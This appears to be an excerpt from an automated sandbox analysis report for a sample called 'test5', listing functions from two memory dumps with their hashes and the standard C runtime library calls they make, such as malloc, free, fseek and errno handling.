__crtIsPackagedApp.LIBCMT ref: 0000021551C0DD93
_dosmaperr.LIBCMT ref: 0000021551C0DDDD

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID: Packaged__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 2917016420-0
Opcode ID: 618a4255488f53f113d74fa2bceb050b7581b57bf5715da974d6dc59db4e5fbf
Instruction ID: a9910452156d2d39f5f9069d96bec80b09d83fc7c3d60a1927e8167b26473ccd
Opcode Fuzzy Hash: 618a4255488f53f113d74fa2bceb050b7581b57bf5715da974d6dc59db4e5fbf
Instruction Fuzzy Hash: 6631D538204F199FEB44AB78C8993BD7AD2FBE8310F54459DA04AC32D2DB39D8408B42

Function 000002155375D197 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000002155375D1BD

Part of subcall function 000002155375F013: _getptd_noexit.LIBCMT ref: 000002155375F017

_invalid_parameter_noinfo.LIBCMT ref: 000002155375D1C9
__crtIsPackagedApp.LIBCMT ref: 000002155375D1DA
_dosmaperr.LIBCMT ref: 000002155375D224

Memory Dump Source

Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21553740000_test5.jbxd

Yara matches

Similarity

API ID: Packaged__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 2917016420-0
Opcode ID: 618a4255488f53f113d74fa2bceb050b7581b57bf5715da974d6dc59db4e5fbf
Instruction ID: 17db524429ac952db9fd1bdbb537e5a59bd04800ab56b437688b32c41a47e420
Opcode Fuzzy Hash: 618a4255488f53f113d74fa2bceb050b7581b57bf5715da974d6dc59db4e5fbf
Instruction Fuzzy Hash: CC31DB30A24E19DFFBD8AF6898593EA72D2FBD8314F54459DA44EC32D1DB38CA418781

Function 0000021551C185FC Relevance: 10.6, APIs: 7, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000021551C18615

Part of subcall function 0000021551C0FBCC: _getptd_noexit.LIBCMT ref: 0000021551C0FBD0

__lock_fhandle.LIBCMT ref: 0000021551C1865D
__doserrno.LIBCMT ref: 0000021551C18692
_errno.LIBCMT ref: 0000021551C18699
_unlock_fhandle.LIBCMT ref: 0000021551C186A9

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID: _errno$__doserrno__lock_fhandle_getptd_noexit_unlock_fhandle
String ID:
API String ID: 4120058822-0
Opcode ID: 479da2c5f7565818e68d8e53e938d4df86e4340f370b51f2ddc53d5decdb60f2
Instruction ID: 64bf3956a1821694b1fc4ba361171359487e098c7c0de72394cf1d29052a521f
Opcode Fuzzy Hash: 479da2c5f7565818e68d8e53e938d4df86e4340f370b51f2ddc53d5decdb60f2
Instruction Fuzzy Hash: EF21D8306CCE11EEF314EB68D8E93ED3E92EBE5310F95099CE41A872D2DA695C404A95

Function 0000021553767A43 Relevance: 10.6, APIs: 7, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000021553767A5C

Part of subcall function 000002155375F013: _getptd_noexit.LIBCMT ref: 000002155375F017

__lock_fhandle.LIBCMT ref: 0000021553767AA4
__doserrno.LIBCMT ref: 0000021553767AD9
_errno.LIBCMT ref: 0000021553767AE0
_unlock_fhandle.LIBCMT ref: 0000021553767AF0

Memory Dump Source

Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21553740000_test5.jbxd

Yara matches

Similarity

API ID: _errno$__doserrno__lock_fhandle_getptd_noexit_unlock_fhandle
String ID:
API String ID: 4120058822-0
Opcode ID: 479da2c5f7565818e68d8e53e938d4df86e4340f370b51f2ddc53d5decdb60f2
Instruction ID: de2ed922f92bbb0095581862d65e935a95e905b561430cfd88fc23ba59b42b8c
Opcode Fuzzy Hash: 479da2c5f7565818e68d8e53e938d4df86e4340f370b51f2ddc53d5decdb60f2
Instruction Fuzzy Hash: 99210B31E28E95EEF3945B6C9CE93EF2682EBE4350F8401ECE01EC71D2D6655A408691

Function 0000021551C0EA50 Relevance: 9.3, APIs: 6, Instructions: 257COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000021551C0EA8C

Part of subcall function 0000021551C0FBCC: _getptd_noexit.LIBCMT ref: 0000021551C0FBD0

_invalid_parameter_noinfo.LIBCMT ref: 0000021551C0EA97
memcpy_s.LIBCMT ref: 0000021551C0EB5C
_fileno.LIBCMT ref: 0000021551C0EBC7
_filbuf.LIBCMT ref: 0000021551C0EBF5
_errno.LIBCMT ref: 0000021551C0EC45

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
String ID:
API String ID: 2328795619-0
Opcode ID: 40b1f2a6e128636b5ea54999467d5c7a08cd77d7087e23116c772b60f44d2d31
Instruction ID: 94911d56badd534912516bc6d625e9e6011782828291eb9566ff8f86ce2a7805
Opcode Fuzzy Hash: 40b1f2a6e128636b5ea54999467d5c7a08cd77d7087e23116c772b60f44d2d31
Instruction Fuzzy Hash: 1461E730258F2596E728563C848E2BD7FD2E7E6720F94039ED056C36D1DA62B8D249C5

Function 0000021551C1DA90 Relevance: 9.1, APIs: 6, Instructions: 108COMMON

Download Yara Rule

APIs

Part of subcall function 0000021551C0F454: _getptd.LIBCMT ref: 0000021551C0F46A
Part of subcall function 0000021551C0F454: __updatetlocinfo.LIBCMT ref: 0000021551C0F49F
Part of subcall function 0000021551C0F454: __updatetmbcinfo.LIBCMT ref: 0000021551C0F4C6

_errno.LIBCMT ref: 0000021551C1DADF
_invalid_parameter_noinfo.LIBCMT ref: 0000021551C1DAEA

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID: __updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
String ID:
API String ID: 2808835054-0
Opcode ID: 1a3c1f90b9e0765be7a3ca57c2f6cc359d18deb9d03ea8ab1d8e9cb83ec138c3
Instruction ID: 7cfbf7a1798133736c4aa66235733ad1dd3c314e7bb2b3e1426101af500636e7
Opcode Fuzzy Hash: 1a3c1f90b9e0765be7a3ca57c2f6cc359d18deb9d03ea8ab1d8e9cb83ec138c3
Instruction Fuzzy Hash: 9431AF30188E189FDB64DF18D0C97AA7AE2FBA8310F9102E9A40AC76D2DA71DC418785

Function 0000021551C0E560 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000021551C0E4B7

Part of subcall function 0000021551C0FBCC: _getptd_noexit.LIBCMT ref: 0000021551C0FBD0

_invalid_parameter_noinfo.LIBCMT ref: 0000021551C0E4C2
_getstream.LIBCMT ref: 0000021551C0E4E2
_errno.LIBCMT ref: 0000021551C0E4F4
_errno.LIBCMT ref: 0000021551C0E506
_openfile.LIBCMT ref: 0000021551C0E534

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
String ID:
API String ID: 1547050394-0
Opcode ID: e7e64d02c261a324f10eaa55451d76097e548527cea89bdf323e0e266a6b3040
Instruction ID: bc8b5ff3daf069d0db8a12bda15e9ac1e1048250604d7c7dd4c22a1c781b845a
Opcode Fuzzy Hash: e7e64d02c261a324f10eaa55451d76097e548527cea89bdf323e0e266a6b3040
Instruction Fuzzy Hash: EE21C970688E59DFF790AB78C4493AD7FD2FBF9310F8509DAA449C3191EA25DC804B81

Function 000002155375D9A7 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 000002155375D8FE

Part of subcall function 000002155375F013: _getptd_noexit.LIBCMT ref: 000002155375F017

_invalid_parameter_noinfo.LIBCMT ref: 000002155375D909
_getstream.LIBCMT ref: 000002155375D929
_errno.LIBCMT ref: 000002155375D93B
_errno.LIBCMT ref: 000002155375D94D
_openfile.LIBCMT ref: 000002155375D97B

Memory Dump Source

Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21553740000_test5.jbxd

Yara matches

Similarity

API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
String ID:
API String ID: 1547050394-0
Opcode ID: 2ee4da16ff171bafb35c0bb8db8b3dd677d1343b8b4ea0f09adf6440b25ff7f8
Instruction ID: 39bc4f3551664db7596cbf9e1c8109b8026844cbe80b43be4b4a7d6308f09950
Opcode Fuzzy Hash: 2ee4da16ff171bafb35c0bb8db8b3dd677d1343b8b4ea0f09adf6440b25ff7f8
Instruction Fuzzy Hash: 4421A730E28F59EFF7D9AB2858093AB76D2EBE8310F4405A9944DC31A2DB64CF4193D1

Function 0000021551BF4170 Relevance: 8.9, APIs: 7, Instructions: 181COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 0000021551BF41BD

Part of subcall function 0000021551C0D1C8: _FF_MSGBANNER.LIBCMT ref: 0000021551C0D1F8
Part of subcall function 0000021551C0D1C8: _NMSG_WRITE.LIBCMT ref: 0000021551C0D202
Part of subcall function 0000021551C0D1C8: _callnewh.LIBCMT ref: 0000021551C0D236
Part of subcall function 0000021551C0D1C8: _errno.LIBCMT ref: 0000021551C0D241
Part of subcall function 0000021551C0D1C8: _errno.LIBCMT ref: 0000021551C0D24C

malloc.LIBCMT ref: 0000021551BF41C8

Part of subcall function 0000021551C0D1C8: _callnewh.LIBCMT ref: 0000021551C0D25C
Part of subcall function 0000021551C0D1C8: _errno.LIBCMT ref: 0000021551C0D261

free.LIBCMT ref: 0000021551BF42AF
free.LIBCMT ref: 0000021551BF42B7
free.LIBCMT ref: 0000021551BF42BF
free.LIBCMT ref: 0000021551BF42CB
free.LIBCMT ref: 0000021551BF42D8

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc
String ID:
API String ID: 2761444284-0
Opcode ID: 5e3b48a2261c00200ba73531dd32d36e90c95496b5af35af7ab5b67e4a0c521d
Instruction ID: 2c27e6e37058aa56f709ed20ffeb9205b8d3a8712460beeeda6bea79e7a81d96
Opcode Fuzzy Hash: 5e3b48a2261c00200ba73531dd32d36e90c95496b5af35af7ab5b67e4a0c521d
Instruction Fuzzy Hash: 5951EA38728F19ABE759DB6C94852F977D1FB99310F90017DD84AC3247EE10EC4286C6

Function 00000215537435B7 Relevance: 8.9, APIs: 7, Instructions: 181COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 0000021553743604

Part of subcall function 000002155375C60F: _FF_MSGBANNER.LIBCMT ref: 000002155375C63F
Part of subcall function 000002155375C60F: _NMSG_WRITE.LIBCMT ref: 000002155375C649
Part of subcall function 000002155375C60F: _callnewh.LIBCMT ref: 000002155375C67D
Part of subcall function 000002155375C60F: _errno.LIBCMT ref: 000002155375C688
Part of subcall function 000002155375C60F: _errno.LIBCMT ref: 000002155375C693

malloc.LIBCMT ref: 000002155374360F

Part of subcall function 000002155375C60F: _callnewh.LIBCMT ref: 000002155375C6A3
Part of subcall function 000002155375C60F: _errno.LIBCMT ref: 000002155375C6A8

free.LIBCMT ref: 00000215537436F6
free.LIBCMT ref: 00000215537436FE
free.LIBCMT ref: 0000021553743706
free.LIBCMT ref: 0000021553743712
free.LIBCMT ref: 000002155374371F

Memory Dump Source

Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21553740000_test5.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc
String ID:
API String ID: 2761444284-0
Opcode ID: 5e3b48a2261c00200ba73531dd32d36e90c95496b5af35af7ab5b67e4a0c521d
Instruction ID: 9062c545b2d7d4f277d2db3d692ee0d725f5291a3d9131ccbb19223460e1544a
Opcode Fuzzy Hash: 5e3b48a2261c00200ba73531dd32d36e90c95496b5af35af7ab5b67e4a0c521d
Instruction Fuzzy Hash: 2351B930728E1A9BFBD99F6894557B773D1FB95300F90016DE44EC3243EA10ED1286C6

Function 000002155374BEBB Relevance: 7.8, APIs: 6, Instructions: 347COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000021553753B83: malloc.LIBCMT ref: 0000021553753B9F

malloc.LIBCMT ref: 000002155374BF65

Part of subcall function 000002155375C60F: _FF_MSGBANNER.LIBCMT ref: 000002155375C63F
Part of subcall function 000002155375C60F: _NMSG_WRITE.LIBCMT ref: 000002155375C649
Part of subcall function 000002155375C60F: _callnewh.LIBCMT ref: 000002155375C67D
Part of subcall function 000002155375C60F: _errno.LIBCMT ref: 000002155375C688
Part of subcall function 000002155375C60F: _errno.LIBCMT ref: 000002155375C693

Part of subcall function 000002155375BE7F: malloc.LIBCMT ref: 000002155375BECF

Part of subcall function 000002155375BE7F: realloc.LIBCMT ref: 000002155375BEDE

malloc.LIBCMT ref: 000002155374C057
_snprintf.LIBCMT ref: 000002155374C0D5
_snprintf.LIBCMT ref: 000002155374C0FD
_snprintf.LIBCMT ref: 000002155374C124
free.LIBCMT ref: 000002155374C292

Part of subcall function 000002155375875B: malloc.LIBCMT ref: 000002155375878F
Part of subcall function 000002155375875B: free.LIBCMT ref: 0000021553758946

Memory Dump Source

Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21553740000_test5.jbxd

Yara matches

Similarity

API ID: malloc$_snprintf$_errnofree$_callnewhrealloc
String ID:
API String ID: 2667508507-0
Opcode ID: 640527ed828b8086bb4541aa1f9c63a5ff0a17add3c1388993af7cef0feedb0d
Instruction ID: 21f69aef45e2f443ce6bb69f5ed179bac9e5e5adb7c31d25f714dc1b2e83ed6e
Opcode Fuzzy Hash: 640527ed828b8086bb4541aa1f9c63a5ff0a17add3c1388993af7cef0feedb0d
Instruction Fuzzy Hash: 27C15630F24E55A7FBD9BB64945A7EB72D3EBE4300F804569A44EC31D3DE349B058682

Function 0000021551C0098C Relevance: 7.7, APIs: 5, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 0000021551C0473C: malloc.LIBCMT ref: 0000021551C04758

Part of subcall function 0000021551C0E560: _errno.LIBCMT ref: 0000021551C0E4B7
Part of subcall function 0000021551C0E560: _invalid_parameter_noinfo.LIBCMT ref: 0000021551C0E4C2

fseek.LIBCMT ref: 0000021551C00A28

Part of subcall function 0000021551C0EDE4: _errno.LIBCMT ref: 0000021551C0EE0C
Part of subcall function 0000021551C0EDE4: _invalid_parameter_noinfo.LIBCMT ref: 0000021551C0EE17

_ftelli64.LIBCMT ref: 0000021551C00A30

Part of subcall function 0000021551C0EE58: _errno.LIBCMT ref: 0000021551C0EE76
Part of subcall function 0000021551C0EE58: _invalid_parameter_noinfo.LIBCMT ref: 0000021551C0EE81

fseek.LIBCMT ref: 0000021551C00A40

Part of subcall function 0000021551C0EDE4: _fseek_nolock.LIBCMT ref: 0000021551C0EE35

malloc.LIBCMT ref: 0000021551C00A80

Part of subcall function 0000021551C0D1C8: _FF_MSGBANNER.LIBCMT ref: 0000021551C0D1F8
Part of subcall function 0000021551C0D1C8: _NMSG_WRITE.LIBCMT ref: 0000021551C0D202
Part of subcall function 0000021551C0D1C8: _callnewh.LIBCMT ref: 0000021551C0D236
Part of subcall function 0000021551C0D1C8: _errno.LIBCMT ref: 0000021551C0D241
Part of subcall function 0000021551C0D1C8: _errno.LIBCMT ref: 0000021551C0D24C

fclose.LIBCMT ref: 0000021551C00B3D

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID: _errno$_invalid_parameter_noinfo$fseekmalloc$_callnewh_fseek_nolock_ftelli64fclose
String ID:
API String ID: 2887643383-0
Opcode ID: fedb8edbf5c7940b4ea62b88292aea04c11e351a8cff1d0d25e5b743e65c6225
Instruction ID: cf8ea697652631f2bad97e790e06f7a1f36717c99c360e589144b2bf6e30bec9
Opcode Fuzzy Hash: fedb8edbf5c7940b4ea62b88292aea04c11e351a8cff1d0d25e5b743e65c6225
Instruction Fuzzy Hash: 3E51E731618E189FD348EB38D4997FD76D2E7D8310F8046ADA44BC32D7DE25AD028A81

Function 000002155374FDD3 Relevance: 7.7, APIs: 5, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 0000021553753B83: malloc.LIBCMT ref: 0000021553753B9F

Part of subcall function 000002155375D9A7: _errno.LIBCMT ref: 000002155375D8FE
Part of subcall function 000002155375D9A7: _invalid_parameter_noinfo.LIBCMT ref: 000002155375D909

fseek.LIBCMT ref: 000002155374FE6F

Part of subcall function 000002155375E22B: _errno.LIBCMT ref: 000002155375E253
Part of subcall function 000002155375E22B: _invalid_parameter_noinfo.LIBCMT ref: 000002155375E25E

_ftelli64.LIBCMT ref: 000002155374FE77

Part of subcall function 000002155375E29F: _errno.LIBCMT ref: 000002155375E2BD
Part of subcall function 000002155375E29F: _invalid_parameter_noinfo.LIBCMT ref: 000002155375E2C8

fseek.LIBCMT ref: 000002155374FE87

Part of subcall function 000002155375E22B: _fseek_nolock.LIBCMT ref: 000002155375E27C

malloc.LIBCMT ref: 000002155374FEC7

Part of subcall function 000002155375C60F: _FF_MSGBANNER.LIBCMT ref: 000002155375C63F
Part of subcall function 000002155375C60F: _NMSG_WRITE.LIBCMT ref: 000002155375C649
Part of subcall function 000002155375C60F: _callnewh.LIBCMT ref: 000002155375C67D
Part of subcall function 000002155375C60F: _errno.LIBCMT ref: 000002155375C688
Part of subcall function 000002155375C60F: _errno.LIBCMT ref: 000002155375C693

fclose.LIBCMT ref: 000002155374FF84

Memory Dump Source

Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21553740000_test5.jbxd

Yara matches

Similarity

API ID: _errno$_invalid_parameter_noinfo$fseekmalloc$_callnewh_fseek_nolock_ftelli64fclose
String ID:
API String ID: 2887643383-0
Opcode ID: fedb8edbf5c7940b4ea62b88292aea04c11e351a8cff1d0d25e5b743e65c6225
Instruction ID: 651d8d832ff8c47fa0d07a12637fa2aefc9a660421389222c60b4525456c4f83
Opcode Fuzzy Hash: fedb8edbf5c7940b4ea62b88292aea04c11e351a8cff1d0d25e5b743e65c6225
Instruction Fuzzy Hash: BA519C31B28E189FE78DE72894597FA72D2F7D9310F90465DA44FC32D7DE24AA0286C1

Function 0000021551C18208 Relevance: 7.7, APIs: 5, Instructions: 201COMMON

Download Yara Rule

APIs

_mtinitlocknum.LIBCMT ref: 0000021551C18235

Part of subcall function 0000021551C11D0C: _FF_MSGBANNER.LIBCMT ref: 0000021551C11D29
Part of subcall function 0000021551C11D0C: _NMSG_WRITE.LIBCMT ref: 0000021551C11D33

_lock.LIBCMT ref: 0000021551C18248
_lock.LIBCMT ref: 0000021551C182A3
_calloc_crt.LIBCMT ref: 0000021551C1835A

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID: _lock$_calloc_crt_mtinitlocknum
String ID:
API String ID: 3962633935-0
Opcode ID: 2a29bece4ed9085b659b0b9be8632e4f0adfe9a3631b402b8879efea4faa0534
Instruction ID: 12c5670d23fd7fd095da13000ab1d2bb122208f24acbc48d0a9861b75e13414a
Opcode Fuzzy Hash: 2a29bece4ed9085b659b0b9be8632e4f0adfe9a3631b402b8879efea4faa0534
Instruction Fuzzy Hash: 2651F470598E18DBE714DF18C8C93E5BBD2FBA8310F94469DE84AC72A2D775D8428782

Function 000002155376764F Relevance: 7.7, APIs: 5, Instructions: 201COMMON

Download Yara Rule

APIs

_mtinitlocknum.LIBCMT ref: 000002155376767C

Part of subcall function 0000021553761153: _FF_MSGBANNER.LIBCMT ref: 0000021553761170
Part of subcall function 0000021553761153: _NMSG_WRITE.LIBCMT ref: 000002155376117A

_lock.LIBCMT ref: 000002155376768F
_lock.LIBCMT ref: 00000215537676EA
_calloc_crt.LIBCMT ref: 00000215537677A1

Memory Dump Source

Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21553740000_test5.jbxd

Yara matches

Similarity

API ID: _lock$_calloc_crt_mtinitlocknum
String ID:
API String ID: 3962633935-0
Opcode ID: 2a29bece4ed9085b659b0b9be8632e4f0adfe9a3631b402b8879efea4faa0534
Instruction ID: 24efb16a3f57810ab9a5ba02a6a70feca1bcf1218ffbceb17ed25bef7d55d2db
Opcode Fuzzy Hash: 2a29bece4ed9085b659b0b9be8632e4f0adfe9a3631b402b8879efea4faa0534
Instruction Fuzzy Hash: BA512670924E58DBEB949F18C8593A6B3D1FBA4310F9041EDD84EC72A2D774D942CB82

Function 0000021551BF54F0 Relevance: 7.7, APIs: 6, Instructions: 175COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 0000021551BF553A

Part of subcall function 0000021551C0D1C8: _FF_MSGBANNER.LIBCMT ref: 0000021551C0D1F8
Part of subcall function 0000021551C0D1C8: _NMSG_WRITE.LIBCMT ref: 0000021551C0D202
Part of subcall function 0000021551C0D1C8: _callnewh.LIBCMT ref: 0000021551C0D236
Part of subcall function 0000021551C0D1C8: _errno.LIBCMT ref: 0000021551C0D241
Part of subcall function 0000021551C0D1C8: _errno.LIBCMT ref: 0000021551C0D24C

malloc.LIBCMT ref: 0000021551BF5545

Part of subcall function 0000021551C0D1C8: _callnewh.LIBCMT ref: 0000021551C0D25C
Part of subcall function 0000021551C0D1C8: _errno.LIBCMT ref: 0000021551C0D261

free.LIBCMT ref: 0000021551BF562C
free.LIBCMT ref: 0000021551BF5634
free.LIBCMT ref: 0000021551BF5640
free.LIBCMT ref: 0000021551BF564D

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc
String ID:
API String ID: 2761444284-0
Opcode ID: 0defe551ebfe3dd8c80660e702d04152503292365c3874501280693d87aa9fc5
Instruction ID: 9fa8cd3b21fa7baa009f36b0c067c519f2c307f1cce82704d2e7f73beb155ec0
Opcode Fuzzy Hash: 0defe551ebfe3dd8c80660e702d04152503292365c3874501280693d87aa9fc5
Instruction Fuzzy Hash: 6041FA34218F1DABE7589B6C98C92BA3AD6E7E6360F94417DE487C3243EE20D90747C1

Function 0000021553744937 Relevance: 7.7, APIs: 6, Instructions: 175COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 0000021553744981

Part of subcall function 000002155375C60F: _FF_MSGBANNER.LIBCMT ref: 000002155375C63F
Part of subcall function 000002155375C60F: _NMSG_WRITE.LIBCMT ref: 000002155375C649
Part of subcall function 000002155375C60F: _callnewh.LIBCMT ref: 000002155375C67D
Part of subcall function 000002155375C60F: _errno.LIBCMT ref: 000002155375C688
Part of subcall function 000002155375C60F: _errno.LIBCMT ref: 000002155375C693

malloc.LIBCMT ref: 000002155374498C

Part of subcall function 000002155375C60F: _callnewh.LIBCMT ref: 000002155375C6A3
Part of subcall function 000002155375C60F: _errno.LIBCMT ref: 000002155375C6A8

free.LIBCMT ref: 0000021553744A73
free.LIBCMT ref: 0000021553744A7B
free.LIBCMT ref: 0000021553744A87
free.LIBCMT ref: 0000021553744A94

Memory Dump Source

Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21553740000_test5.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc
String ID:
API String ID: 2761444284-0
Opcode ID: 0defe551ebfe3dd8c80660e702d04152503292365c3874501280693d87aa9fc5
Instruction ID: 0344842dfcc2a62cc42a144afce85db8aae4f44b31c4f3d43e69898f420b01af
Opcode Fuzzy Hash: 0defe551ebfe3dd8c80660e702d04152503292365c3874501280693d87aa9fc5
Instruction Fuzzy Hash: 6B411931728F1D9BEBA8AA68584A3BB32C6E7E5310F50456DD48FC3253ED20E91747C5

Function 000002155375DFE4 Relevance: 7.7, APIs: 5, Instructions: 169COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000002155375DEDE
memcpy_s.LIBCMT ref: 000002155375DFA3
_fileno.LIBCMT ref: 000002155375E00E

Part of subcall function 0000021553762D5B: _errno.LIBCMT ref: 0000021553762D64
Part of subcall function 0000021553762D5B: _invalid_parameter_noinfo.LIBCMT ref: 0000021553762D6F

Part of subcall function 000002155376423F: __doserrno.LIBCMT ref: 0000021553764279
Part of subcall function 000002155376423F: _errno.LIBCMT ref: 0000021553764280

_filbuf.LIBCMT ref: 000002155375E03C
_errno.LIBCMT ref: 000002155375E08C

Memory Dump Source

Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21553740000_test5.jbxd

Yara matches

Similarity

API ID: _errno$_invalid_parameter_noinfo$__doserrno_filbuf_filenomemcpy_s
String ID:
API String ID: 1812282339-0
Opcode ID: f984b88899510e62cbe18468345cbbe3864e5a8b2208229d8901ea8d74a4c81d
Instruction ID: 779bd478c25195d094e7ccba73d1ac57824c7738feb89f8de1abce3e988c1e69
Opcode Fuzzy Hash: f984b88899510e62cbe18468345cbbe3864e5a8b2208229d8901ea8d74a4c81d
Instruction Fuzzy Hash: D141B731A38E29DBE6AC562C545D2FA73D3E7F4720FA403AED05EC36D2DA10DA5242C1

Function 0000021551C10250 Relevance: 7.6, APIs: 5, Instructions: 149COMMONLIBRARYCODE

Download Yara Rule

APIs

_fileno.LIBCMT ref: 0000021551C1026D

Part of subcall function 0000021551C13914: _errno.LIBCMT ref: 0000021551C1391D
Part of subcall function 0000021551C13914: _invalid_parameter_noinfo.LIBCMT ref: 0000021551C13928

_errno.LIBCMT ref: 0000021551C1027D

Part of subcall function 0000021551C0FBCC: _getptd_noexit.LIBCMT ref: 0000021551C0FBD0

_errno.LIBCMT ref: 0000021551C10299
_isatty.LIBCMT ref: 0000021551C102FA
_getbuf.LIBCMT ref: 0000021551C10306

Memory Dump Source

Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd

Yara matches

Similarity

API ID: _errno$_fileno_getbuf_getptd_noexit_invalid_parameter_noinfo_isatty
String ID:
API String ID: 304646821-0
Opcode ID: 872796ac68f0a2c990ec7574be4b8262460ebf94b78f5d760dc63ea6db356553
Instruction ID: 8cabe3e0ca31af04a478808a6c3219eafa903ad028d136bac3ebb150f28cee04
Opcode Fuzzy Hash: 872796ac68f0a2c990ec7574be4b8262460ebf94b78f5d760dc63ea6db356553
Instruction Fuzzy Hash: CF51B130194E28DFEB98DF28C4D97EA7AD2FBA8310F9406D9D855CB2D6D676C850C780

Function 000002155375F697 Relevance: 7.6, APIs: 5, Instructions: 149COMMONLIBRARYCODE

Download Yara Rule

APIs

_fileno.LIBCMT ref: 000002155375F6B4

Part of subcall function 0000021553762D5B: _errno.LIBCMT ref: 0000021553762D64
Part of subcall function 0000021553762D5B: _invalid_parameter_noinfo.LIBCMT ref: 0000021553762D6F

_errno.LIBCMT ref: 000002155375F6C4

